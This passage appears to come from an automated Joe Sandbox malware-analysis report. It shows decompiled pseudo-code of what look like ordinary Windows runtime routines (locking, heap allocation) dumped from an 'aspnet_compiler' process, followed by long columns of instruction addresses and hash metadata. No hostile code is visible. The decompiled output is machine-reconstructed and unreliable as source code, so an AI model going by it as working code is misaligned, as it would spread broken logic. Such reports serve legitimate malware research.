									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E011D006A(0x1288608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1288608);
												E011DB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1286904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1286e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E011AFFB0(_t198, _t240, 0x1288608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E011D00C2(0x1288608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                        0x011c20a0
                                                                                        0x011c20a8
                                                                                        0x011c20ad
                                                                                        0x011c20b3
                                                                                        0x011c20b8
                                                                                        0x011c20c2
                                                                                        0x011c20c7
                                                                                        0x011c20cb
                                                                                        0x011c20d2
                                                                                        0x011c2263
                                                                                        0x011c2266
                                                                                        0x01205836
                                                                                        0x01205836
                                                                                        0x00000000
                                                                                        0x011c226c
                                                                                        0x011c226c
                                                                                        0x011c2270
                                                                                        0x011c2274
                                                                                        0x011c20e2
                                                                                        0x011c20e2
                                                                                        0x011c20e6
                                                                                        0x011c20ee
                                                                                        0x012057dc
                                                                                        0x012057de
                                                                                        0x012057ec
                                                                                        0x012057ec
                                                                                        0x012057f1
                                                                                        0x012057f3
                                                                                        0x012057f8
                                                                                        0x00000000
                                                                                        0x012057f8
                                                                                        0x012057e0
                                                                                        0x012057e4
                                                                                        0x012057ea
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012057ea
                                                                                        0x011c20f4
                                                                                        0x011c20f4
                                                                                        0x011c20f8
                                                                                        0x011c20f8
                                                                                        0x011c20fc
                                                                                        0x011c2100
                                                                                        0x011c2106
                                                                                        0x011c2201
                                                                                        0x011c2206
                                                                                        0x011c220b
                                                                                        0x011c220e
                                                                                        0x011c22a9
                                                                                        0x011c22ac
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c22b2
                                                                                        0x011c22b5
                                                                                        0x01205801
                                                                                        0x01205806
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01205810
                                                                                        0x01205815
                                                                                        0x01205818
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120581e
                                                                                        0x011c22bb
                                                                                        0x011c22bb
                                                                                        0x011c2218
                                                                                        0x011c2218
                                                                                        0x011c221c
                                                                                        0x011c2220
                                                                                        0x011c2222
                                                                                        0x011c22c2
                                                                                        0x011c22c4
                                                                                        0x011c22dc
                                                                                        0x011c22dc
                                                                                        0x011c22e1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c22e7
                                                                                        0x011c22c8
                                                                                        0x011c22cd
                                                                                        0x011c22d3
                                                                                        0x011c22d6
                                                                                        0x01205823
                                                                                        0x01205825
                                                                                        0x01205827
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120582d
                                                                                        0x00000000
                                                                                        0x0120582d
                                                                                        0x00000000
                                                                                        0x011c2228
                                                                                        0x011c2228
                                                                                        0x00000000
                                                                                        0x011c2228
                                                                                        0x011c2222
                                                                                        0x011c2214
                                                                                        0x011c2214
                                                                                        0x00000000
                                                                                        0x011c2114
                                                                                        0x011c2114
                                                                                        0x011c2114
                                                                                        0x011c211a
                                                                                        0x011c211c
                                                                                        0x011c2348
                                                                                        0x011c234d
                                                                                        0x01205840
                                                                                        0x01205845
                                                                                        0x01205848
                                                                                        0x0120584e
                                                                                        0x0120584e
                                                                                        0x01205848
                                                                                        0x011c2353
                                                                                        0x011c2355
                                                                                        0x011c2388
                                                                                        0x011c2388
                                                                                        0x011c2368
                                                                                        0x011c236a
                                                                                        0x011c236c
                                                                                        0x011c238f
                                                                                        0x00000000
                                                                                        0x011c236e
                                                                                        0x011c236e
                                                                                        0x011c218e
                                                                                        0x011c218e
                                                                                        0x011c2191
                                                                                        0x011c2195
                                                                                        0x01205a03
                                                                                        0x01205a06
                                                                                        0x01205a0c
                                                                                        0x01205a0f
                                                                                        0x01205a11
                                                                                        0x01205a13
                                                                                        0x01205a13
                                                                                        0x01205a19
                                                                                        0x01205a1f
                                                                                        0x00000000
                                                                                        0x011c219b
                                                                                        0x011c219b
                                                                                        0x011c21a0
                                                                                        0x011c2282
                                                                                        0x011c2284
                                                                                        0x011c2284
                                                                                        0x011c2284
                                                                                        0x011c2284
                                                                                        0x011c21a6
                                                                                        0x011c21a9
                                                                                        0x011c21ac
                                                                                        0x011c21ae
                                                                                        0x011c21b3
                                                                                        0x011c228b
                                                                                        0x011c2290
                                                                                        0x011c2379
                                                                                        0x011c2296
                                                                                        0x011c2298
                                                                                        0x011c2298
                                                                                        0x011c2290
                                                                                        0x011c21b9
                                                                                        0x011c21be
                                                                                        0x011c22a2
                                                                                        0x011c22a2
                                                                                        0x011c21c4
                                                                                        0x011c21c8
                                                                                        0x011c21cc
                                                                                        0x011c21d0
                                                                                        0x011c21d4
                                                                                        0x011c21de
                                                                                        0x011c21e3
                                                                                        0x01205a29
                                                                                        0x01205a2c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01205a3b
                                                                                        0x00000000
                                                                                        0x011c21e9
                                                                                        0x011c21e9
                                                                                        0x011c21e9
                                                                                        0x011c21ee
                                                                                        0x011c21f1
                                                                                        0x01205a45
                                                                                        0x01205a4b
                                                                                        0x01205a52
                                                                                        0x01205a58
                                                                                        0x01205a5d
                                                                                        0x01205a5f
                                                                                        0x01205a71
                                                                                        0x01205a61
                                                                                        0x01205a6a
                                                                                        0x01205a6a
                                                                                        0x01205a76
                                                                                        0x01205a79
                                                                                        0x01205a7f
                                                                                        0x01205a83
                                                                                        0x01205a85
                                                                                        0x01205a87
                                                                                        0x01205a87
                                                                                        0x01205a8c
                                                                                        0x01205a91
                                                                                        0x01205a97
                                                                                        0x01205a9f
                                                                                        0x01205aa0
                                                                                        0x01205aa1
                                                                                        0x01205aa6
                                                                                        0x01205aab
                                                                                        0x01205ab1
                                                                                        0x01205ab3
                                                                                        0x01205ab9
                                                                                        0x01205aca
                                                                                        0x01205ad4
                                                                                        0x01205ad4
                                                                                        0x01205ade
                                                                                        0x01205ade
                                                                                        0x01205aab
                                                                                        0x01205a79
                                                                                        0x01205a52
                                                                                        0x011c21f7
                                                                                        0x011c21f9
                                                                                        0x011c21fe
                                                                                        0x011c21fe
                                                                                        0x011c21e3
                                                                                        0x011c2195
                                                                                        0x011c236c
                                                                                        0x011c2122
                                                                                        0x011c2122
                                                                                        0x011c2124
                                                                                        0x011c2231
                                                                                        0x011c2236
                                                                                        0x011c2236
                                                                                        0x011c2238
                                                                                        0x011c2238
                                                                                        0x011c2240
                                                                                        0x011c2242
                                                                                        0x011c2244
                                                                                        0x012059fc
                                                                                        0x011c218c
                                                                                        0x011c218c
                                                                                        0x00000000
                                                                                        0x011c218c
                                                                                        0x011c224a
                                                                                        0x011c224f
                                                                                        0x011c2256
                                                                                        0x011c2304
                                                                                        0x011c2309
                                                                                        0x011c230f
                                                                                        0x011c231e
                                                                                        0x011c231e
                                                                                        0x011c231e
                                                                                        0x011c2320
                                                                                        0x011c2325
                                                                                        0x011c232a
                                                                                        0x011c232c
                                                                                        0x011c233e
                                                                                        0x011c233e
                                                                                        0x00000000
                                                                                        0x011c232c
                                                                                        0x011c2311
                                                                                        0x011c2317
                                                                                        0x011c231a
                                                                                        0x011c231c
                                                                                        0x011c2380
                                                                                        0x011c2380
                                                                                        0x011c2380
                                                                                        0x011c2384
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c2386
                                                                                        0x00000000
                                                                                        0x011c231c
                                                                                        0x011c225c
                                                                                        0x011c225c
                                                                                        0x00000000
                                                                                        0x011c225c
                                                                                        0x011c212a
                                                                                        0x011c2134
                                                                                        0x011c2138
                                                                                        0x011c213d
                                                                                        0x01205858
                                                                                        0x01205863
                                                                                        0x01205863
                                                                                        0x01205867
                                                                                        0x0120586a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120586c
                                                                                        0x0120586c
                                                                                        0x01205871
                                                                                        0x01205875
                                                                                        0x01205877
                                                                                        0x01205997
                                                                                        0x0120599c
                                                                                        0x012059a1
                                                                                        0x012059a7
                                                                                        0x012059a7
                                                                                        0x00000000
                                                                                        0x012059a7
                                                                                        0x0120587d
                                                                                        0x00000000
                                                                                        0x0120588b
                                                                                        0x0120588b
                                                                                        0x01205890
                                                                                        0x01205892
                                                                                        0x01205894
                                                                                        0x01205899
                                                                                        0x0120589b
                                                                                        0x012058a0
                                                                                        0x012058a0
                                                                                        0x012058aa
                                                                                        0x012058b2
                                                                                        0x012058b6
                                                                                        0x012058be
                                                                                        0x012058c6
                                                                                        0x012058c9
                                                                                        0x0120590d
                                                                                        0x01205917
                                                                                        0x0120591a
                                                                                        0x0120591c
                                                                                        0x01205920
                                                                                        0x01205928
                                                                                        0x0120592a
                                                                                        0x0120592c
                                                                                        0x0120592e
                                                                                        0x0120592e
                                                                                        0x012058cb
                                                                                        0x012058cd
                                                                                        0x012058d8
                                                                                        0x012058e0
                                                                                        0x012058f4
                                                                                        0x012058fe
                                                                                        0x012058fe
                                                                                        0x0120593a
                                                                                        0x0120593e
                                                                                        0x01205940
                                                                                        0x01205942
                                                                                        0x00000000
                                                                                        0x01205944
                                                                                        0x01205944
                                                                                        0x01205949
                                                                                        0x0120594e
                                                                                        0x0120594e
                                                                                        0x01205953
                                                                                        0x0120595b
                                                                                        0x01205976
                                                                                        0x01205976
                                                                                        0x0120597a
                                                                                        0x0120597f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01205981
                                                                                        0x01205981
                                                                                        0x01205981
                                                                                        0x01205983
                                                                                        0x01205988
                                                                                        0x0120598d
                                                                                        0x01205991
                                                                                        0x01205991
                                                                                        0x00000000
                                                                                        0x0120595d
                                                                                        0x0120595d
                                                                                        0x01205963
                                                                                        0x01205965
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01205967
                                                                                        0x01205967
                                                                                        0x0120596b
                                                                                        0x0120596d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120596f
                                                                                        0x01205971
                                                                                        0x01205971
                                                                                        0x01205974
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01205974
                                                                                        0x00000000
                                                                                        0x01205967
                                                                                        0x0120595b
                                                                                        0x01205942
                                                                                        0x01205863
                                                                                        0x011c2143
                                                                                        0x011c2143
                                                                                        0x011c2149
                                                                                        0x011c214f
                                                                                        0x011c22f1
                                                                                        0x011c22f6
                                                                                        0x00000000
                                                                                        0x011c2173
                                                                                        0x011c2173
                                                                                        0x011c217d
                                                                                        0x011c2181
                                                                                        0x011c2186
                                                                                        0x012059ae
                                                                                        0x012059b2
                                                                                        0x012059b5
                                                                                        0x012059b7
                                                                                        0x012059ba
                                                                                        0x012059cd
                                                                                        0x012059d1
                                                                                        0x012059d5
                                                                                        0x012059d9
                                                                                        0x012059db
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012059dd
                                                                                        0x012059dd
                                                                                        0x012059e1
                                                                                        0x012059e4
                                                                                        0x012059e7
                                                                                        0x012059ee
                                                                                        0x012059ee
                                                                                        0x012059f3
                                                                                        0x012059f3
                                                                                        0x00000000
                                                                                        0x011c2186
                                                                                        0x011c214f
                                                                                        0x011c2106
                                                                                        0x011c2266
                                                                                        0x011c20d8
                                                                                        0x011c20da
                                                                                        0x011c20e0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 131b96bde557cf94f53481eaee880057b3866d90a2f2f2694f55c72cde8084b3
                                                                                        • Instruction ID: 891577b3b0c30b095be2eaad3cf72fc3ac9640ee3cd77edfe48523eb9caa2ff0
                                                                                        • Opcode Fuzzy Hash: 131b96bde557cf94f53481eaee880057b3866d90a2f2f2694f55c72cde8084b3
                                                                                        • Instruction Fuzzy Hash: 87F116316183429FD72ECF2CC44076A7BE2AFE5B14F05861DEA959B2C2D774D841CB82
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011A849B Relevance: .3, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 92%
                                                                                        			E011A849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x126f9c0);
				E011ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1287b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E011ACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E011B2280( *[fs:0x30], 0x1288550);
						_t139 =  *0x1287b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E011CF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E011AFFB0(_t193, _t235, 0x1288550);
								L5:
								return E011ED130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01191C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1287b9c; // 0x0
							_t235 = L011B4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1287b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E011CA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E011AFFB0(_t193, _t235, 0x1288550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L011B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L011B77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1287b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1287b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E011D37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1287b9c; // 0x0
									_t214 = L011B4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E011D37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1287b10 =  *0x1287b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1287b04 =  *0x1287b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L011B77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L011B77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1287b08 =  *0x1287b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E011D57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E011DF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L011B77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E011CA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L011B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E011D96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                        0x011a849b
                                                                                        0x011a849b
                                                                                        0x011a849b
                                                                                        0x011a849b
                                                                                        0x011a849d
                                                                                        0x011a84a2
                                                                                        0x011a84a7
                                                                                        0x011a84b1
                                                                                        0x011a84d8
                                                                                        0x00000000
                                                                                        0x011a84b3
                                                                                        0x011a84c4
                                                                                        0x011a84c9
                                                                                        0x011a84cd
                                                                                        0x011a84cf
                                                                                        0x011a84cf
                                                                                        0x011a84d6
                                                                                        0x011a84e6
                                                                                        0x011a84e9
                                                                                        0x011a84ec
                                                                                        0x011a84ef
                                                                                        0x011a84f2
                                                                                        0x011a84f4
                                                                                        0x011a84fc
                                                                                        0x011a8501
                                                                                        0x011a8506
                                                                                        0x011a8509
                                                                                        0x011a86e0
                                                                                        0x011a86e5
                                                                                        0x011a86e8
                                                                                        0x011a86ed
                                                                                        0x011a86f0
                                                                                        0x011a86f2
                                                                                        0x011f9afd
                                                                                        0x011f9b02
                                                                                        0x011a84da
                                                                                        0x011a84df
                                                                                        0x011a84df
                                                                                        0x011a86fa
                                                                                        0x011a86fd
                                                                                        0x011a86fe
                                                                                        0x011a8701
                                                                                        0x011a8706
                                                                                        0x011a8709
                                                                                        0x011a870b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a8711
                                                                                        0x011a8725
                                                                                        0x011a8727
                                                                                        0x011a872a
                                                                                        0x011a872c
                                                                                        0x011f9af0
                                                                                        0x011f9af5
                                                                                        0x011a8732
                                                                                        0x011a8732
                                                                                        0x011a8732
                                                                                        0x011a8735
                                                                                        0x011a8737
                                                                                        0x011a8515
                                                                                        0x011a8515
                                                                                        0x011a8518
                                                                                        0x011a851d
                                                                                        0x011a8523
                                                                                        0x011a8527
                                                                                        0x011a852b
                                                                                        0x011a8537
                                                                                        0x011a8539
                                                                                        0x011a853c
                                                                                        0x011a853e
                                                                                        0x011a868c
                                                                                        0x011a8691
                                                                                        0x011a8699
                                                                                        0x011a869b
                                                                                        0x011a8744
                                                                                        0x011a8748
                                                                                        0x011a86a1
                                                                                        0x011a86a1
                                                                                        0x011a86a1
                                                                                        0x011a86a4
                                                                                        0x011a86a8
                                                                                        0x011f9bdf
                                                                                        0x011f9bdf
                                                                                        0x011a86ae
                                                                                        0x011a86b0
                                                                                        0x00000000
                                                                                        0x011a86b6
                                                                                        0x00000000
                                                                                        0x011f9be9
                                                                                        0x011a86b0
                                                                                        0x011a8544
                                                                                        0x011a854a
                                                                                        0x011a854d
                                                                                        0x011a8551
                                                                                        0x011a876e
                                                                                        0x011a8778
                                                                                        0x011a877b
                                                                                        0x011a8780
                                                                                        0x011a8557
                                                                                        0x011a8557
                                                                                        0x011a855d
                                                                                        0x011a855d
                                                                                        0x011a856b
                                                                                        0x011a856e
                                                                                        0x011a8570
                                                                                        0x011a8573
                                                                                        0x011a8576
                                                                                        0x011a8576
                                                                                        0x011a8579
                                                                                        0x011a857b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a8581
                                                                                        0x011a85a0
                                                                                        0x011a85a2
                                                                                        0x011a85a5
                                                                                        0x011a85a7
                                                                                        0x011f9b1b
                                                                                        0x011f9b1b
                                                                                        0x011a862e
                                                                                        0x011a862e
                                                                                        0x011a8631
                                                                                        0x011a8631
                                                                                        0x011a8634
                                                                                        0x011a8636
                                                                                        0x011a8669
                                                                                        0x011a8669
                                                                                        0x011a866b
                                                                                        0x011f9bbf
                                                                                        0x011f9bc4
                                                                                        0x011f9bc8
                                                                                        0x011f9bce
                                                                                        0x011f9bce
                                                                                        0x011a8671
                                                                                        0x011a8671
                                                                                        0x011a8674
                                                                                        0x011a8676
                                                                                        0x011f9bae
                                                                                        0x011f9bae
                                                                                        0x011a8676
                                                                                        0x011a867c
                                                                                        0x011a867e
                                                                                        0x011a8688
                                                                                        0x011a8688
                                                                                        0x00000000
                                                                                        0x011a867e
                                                                                        0x011a8638
                                                                                        0x011a8638
                                                                                        0x011a863b
                                                                                        0x011a863e
                                                                                        0x011a863f
                                                                                        0x011a8642
                                                                                        0x011a8645
                                                                                        0x011a8648
                                                                                        0x011a864d
                                                                                        0x011f9b69
                                                                                        0x011f9b6e
                                                                                        0x011f9b7b
                                                                                        0x011f9b81
                                                                                        0x011f9b85
                                                                                        0x011f9b89
                                                                                        0x011f9ba7
                                                                                        0x011f9b8b
                                                                                        0x011f9b91
                                                                                        0x011f9b9a
                                                                                        0x011f9b9f
                                                                                        0x011f9b9f
                                                                                        0x011a8788
                                                                                        0x011a878d
                                                                                        0x011a8763
                                                                                        0x011a8763
                                                                                        0x011a8766
                                                                                        0x00000000
                                                                                        0x011a8766
                                                                                        0x011f9b70
                                                                                        0x00000000
                                                                                        0x011f9b70
                                                                                        0x011a8656
                                                                                        0x011a865a
                                                                                        0x011a865c
                                                                                        0x011a8752
                                                                                        0x011a8756
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011a875e
                                                                                        0x00000000
                                                                                        0x011a875e
                                                                                        0x011a8662
                                                                                        0x011a8662
                                                                                        0x011a8662
                                                                                        0x011a8666
                                                                                        0x00000000
                                                                                        0x011a8666
                                                                                        0x011a85b7
                                                                                        0x011a85b9
                                                                                        0x011a85bc
                                                                                        0x011a85bf
                                                                                        0x011a85cc
                                                                                        0x011a85d1
                                                                                        0x011a85d4
                                                                                        0x011a85db
                                                                                        0x011a85de
                                                                                        0x011a85e0
                                                                                        0x011f9b5f
                                                                                        0x00000000
                                                                                        0x011f9b5f
                                                                                        0x011a85e6
                                                                                        0x011a85ea
                                                                                        0x011a86c3
                                                                                        0x011a86c5
                                                                                        0x011a86c8
                                                                                        0x011a86ca
                                                                                        0x011f9b16
                                                                                        0x00000000
